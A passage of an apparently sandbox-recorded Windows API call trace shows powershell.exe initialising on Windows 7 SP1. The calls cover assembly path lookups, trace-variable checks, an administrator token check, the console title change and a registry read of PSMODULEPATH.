	[0545.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0545.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0546.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ed700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0546.968] SetErrorMode (uMode=0x1) returned 0x1
	[0546.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ed980 | out: lpFileInformation=0x1ed980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0546.968] SetErrorMode (uMode=0x1) returned 0x1
	[0555.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0555.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0555.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0555.591] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.591] CoTaskMemFree (pv=0x40a230) 
	[0555.594] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.595] CoTaskMemFree (pv=0x40a230) 
	[0555.595] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.595] CoTaskMemFree (pv=0x40a230) 
	[0555.598] CoCreateGuid (in: pguid=0x1edd48 | out: pguid=0x1edd48*(Data1=0xa75258b9, Data2=0xef6b, Data3=0x4600, Data4=([0]=0x82, [1]=0xb, [2]=0x8c, [3]=0x7f, [4]=0x9e, [5]=0xe8, [6]=0xf2, [7]=0xba))) returned 0x0
	[0555.601] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.601] CoTaskMemFree (pv=0x40a230) 
	[0555.604] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.604] CoTaskMemFree (pv=0x40a230) 
	[0555.607] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0555.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0555.607] CoTaskMemFree (pv=0x40a230) 
	[0555.615] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0557.539] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ed9f0 | out: lpConsoleScreenBufferInfo=0x1ed9f0) returned 1
	[0557.545] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0557.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ed9f0 | out: lpConsoleScreenBufferInfo=0x1ed9f0) returned 1
	[0557.546] GetVersionExW (in: lpVersionInformation=0x1ed980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0557.548] GetCurrentProcess () returned 0xffffffffffffffff
	[0557.549] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1eda18 | out: TokenHandle=0x1eda18*=0x314) returned 1
	[0557.552] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed938 | out: TokenInformation=0x0, ReturnLength=0x1ed938) returned 0
	[0557.553] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3672e0
	[0557.553] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x3672e0, TokenInformationLength=0x4, ReturnLength=0x1ed938 | out: TokenInformation=0x3672e0, ReturnLength=0x1ed938) returned 1
	[0557.555] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1eda98 | out: phNewToken=0x1eda98*=0x2d8) returned 1
	[0557.555] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ed938 | out: TokenInformation=0x0, ReturnLength=0x1ed938) returned 0
	[0557.555] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x367290
	[0557.555] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x367290, TokenInformationLength=0x4, ReturnLength=0x1ed938 | out: TokenInformation=0x367290, ReturnLength=0x1ed938) returned 1
	[0557.556] CheckTokenMembership (in: TokenHandle=0x2d8, SidToCheck=0x2d84e60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1edaa8 | out: IsMember=0x1edaa8) returned 1
	[0557.556] CloseHandle (hObject=0x2d8) returned 1
	[0557.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.583] CoTaskMemAlloc (cb=0x804) returned 0x1b9b3080
	[0557.583] GetConsoleTitleW (in: lpConsoleTitle=0x1b9b3080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0557.583] CoTaskMemFree (pv=0x1b9b3080) 
	[0557.606] CoTaskMemAlloc (cb=0x804) returned 0x1b9b3930
	[0557.606] GetConsoleTitleW (in: lpConsoleTitle=0x1b9b3930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0557.606] CoTaskMemFree (pv=0x1b9b3930) 
	[0557.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0557.608] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0559.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0559.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0559.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0559.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0562.732] SetConsoleCtrlHandler (HandlerRoutine=0x29568dc, Add=1) returned 1
	[0564.193] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0564.195] CoCreateGuid (in: pguid=0x1edb90 | out: pguid=0x1edb90*(Data1=0xeea8c2ce, Data2=0xc900, Data3=0x4f3f, Data4=([0]=0xab, [1]=0x39, [2]=0x8b, [3]=0x4a, [4]=0x6f, [5]=0xe0, [6]=0xfc, [7]=0x35))) returned 0x0
	[0564.196] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.196] CoTaskMemFree (pv=0x40a230) 
	[0564.211] WinSqmIsOptedIn () returned 0x0
	[0564.212] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.212] CoTaskMemFree (pv=0x40a230) 
	[0564.212] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.213] CoTaskMemFree (pv=0x40a230) 
	[0564.213] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.213] CoTaskMemFree (pv=0x40a230) 
	[0564.214] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.214] CoTaskMemFree (pv=0x40a230) 
	[0564.215] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.215] CoTaskMemFree (pv=0x40a230) 
	[0564.216] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.216] CoTaskMemFree (pv=0x40a230) 
	[0564.217] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.217] CoTaskMemFree (pv=0x40a230) 
	[0564.217] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.217] CoTaskMemFree (pv=0x40a230) 
	[0564.219] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.219] CoTaskMemFree (pv=0x40a230) 
	[0564.223] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0564.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.223] CoTaskMemFree (pv=0x40a230) 
	[0565.441] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0565.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.441] CoTaskMemFree (pv=0x40a230) 
	[0565.442] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0565.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.442] CoTaskMemFree (pv=0x40a230) 
	[0568.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0571.198] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0571.198] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0571.198] CoTaskMemFree (pv=0x40a230) 
	[0571.199] CoTaskMemAlloc (cb=0xcc) returned 0x3fff60
	[0571.199] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3fff60, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0571.200] CoTaskMemFree (pv=0x3fff60) 
	[0571.200] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed708 | out: phkResult=0x1ed708*=0x31c) returned 0x0
	[0571.200] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed68c, lpData=0x0, lpcbData=0x1ed688*=0x0 | out: lpType=0x1ed68c*=0x2, lpData=0x0, lpcbData=0x1ed688*=0x6c) returned 0x0
	[0571.200] CoTaskMemAlloc (cb=0x70) returned 0x3a0a60
	[0571.200] RegQueryValueExW (in: hKey=0x31c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed65c, lpData=0x3a0a60, lpcbData=0x1ed658*=0x6c | out: lpType=0x1ed65c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ed658*=0x6c) returned 0x0
	[0571.200] CoTaskMemFree (pv=0x3a0a60) 
